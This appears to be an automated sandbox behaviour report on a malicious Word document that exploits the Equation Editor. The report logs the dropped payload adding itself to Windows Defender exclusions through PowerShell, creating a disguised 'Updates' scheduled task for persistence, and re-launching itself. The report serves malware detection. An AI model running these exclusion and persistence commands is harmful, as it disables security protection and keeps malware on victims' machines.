                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................d%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................{%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........%.........................s.................... .......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......%.........................s....................$.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......*&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......R&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......j&.........................s....................l.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......z&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`. ............... .....(.P.....................x...............................................................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......HJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......TJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......iJ.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......uJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........J.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........J.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......<.......D.......@........J.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........K.........................s.................... .......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............'K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............EK.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............SK.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....eK.........................s....................$.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......wK.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s....................l.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....<.......D.......@........L.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........L.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........C.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........C.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......#D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0......./D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................0.......AD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......MD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0......._D.........................s.................... .......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......kD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......}D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......D.........................s....................$.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................D.........................s....................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................E.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................E.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................'E.........................s............................................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................8......................................h...............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..............................8..............................................j.......(. .............
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Scan 368 1.docVirustotal: Detection: 47%
                    Source: Scan 368 1.docReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasman.dll
